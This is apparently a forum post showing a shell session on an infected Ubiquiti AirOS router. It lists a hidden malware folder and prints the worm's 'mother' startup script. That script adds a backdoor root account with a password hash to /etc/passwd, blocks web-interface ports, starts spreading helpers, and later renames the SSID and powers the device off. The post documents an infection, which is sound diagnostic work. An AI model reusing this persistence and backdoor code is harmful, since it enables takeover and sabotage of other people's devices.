
Kód: Vybrat vše
XM.v5.5.10# cd /etc/persistent/
XM.v5.5.10# ls
cardlist.txt dropbear_rsa_host_key mf.tar
dropbear_dss_host_key mcuser rc.poststart
XM.v5.5.10# ls -Al
drwxrwxr-x 2 1001 1001 320 May 14 10:44 .mf
lrwxrwxrwx 1 ubnt admin 21 Jan 1 1970 cardlist.txt -> /usr/etc/cardlist.txt
-rw------- 1 ubnt admin 457 May 28 2013 dropbear_dss_host_key
-rw------- 1 ubnt admin 427 May 28 2013 dropbear_rsa_host_key
drwxr-xr-x 3 ubnt admin 60 Jan 1 1970 mcuser
-rw------- 1 ubnt admin 20480 May 14 10:44 mf.tar
-rwxr-xr-x 1 ubnt admin 65 May 13 17:33 rc.poststart
XM.v5.5.10# cd .mf/
XM.v5.5.10# ls
curl infect mfid
download libcrypto.so.0.9.8 mfid.pub
fuck libcurl.so.4 mother
fucker libssl.so.0.9.8 search
i mf.tar
XM.v5.5.10# cat mother
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd
iptables -I INPUT -p tcp --dport 80 -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport 443 -j DROP 2>/dev/null
cp $per/mf.tar $per/.mf/
(sleep 90 ; $per/.mf/download )&
(sleep 70 ; sleep 50 ; sleep 30 ; $per/.mf/search 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 35 ; $per/.mf/search 7 15 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 45 ; $per/.mf/search 0 64 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 55 ; $per/.mf/search 25 16 2>/dev/null >/dev/null )&
(sleep 66666 ; $per/.mf/fucker 2>/dev/null >/dev/null )&
(sleep 666666 ; sed -i 's/wireless.1.ssid=.*/wireless.1.ssid=motherfucker/' /tmp/system.cfg ; sed -i 's/radio.1.mode=.*/radio.1.mode=Master/' /tmp/system.cfg; cfgmtd -f /tmp/system.cfg -w ; sleep 15 ; poweroff ) &
XM.v5.5.10#